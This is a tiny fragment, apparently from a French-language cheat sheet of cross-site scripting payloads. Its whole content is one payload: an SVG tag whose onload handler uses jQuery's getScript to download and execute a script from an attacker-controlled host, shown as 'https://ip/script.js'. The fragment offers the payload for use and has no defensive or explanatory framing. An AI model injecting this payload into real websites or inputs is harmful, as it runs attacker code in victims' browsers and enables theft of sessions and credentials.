XSS payloads

  • Télécharge et exécute le script via onload:
<svg onload="$.getScript('https://ip/script.js')">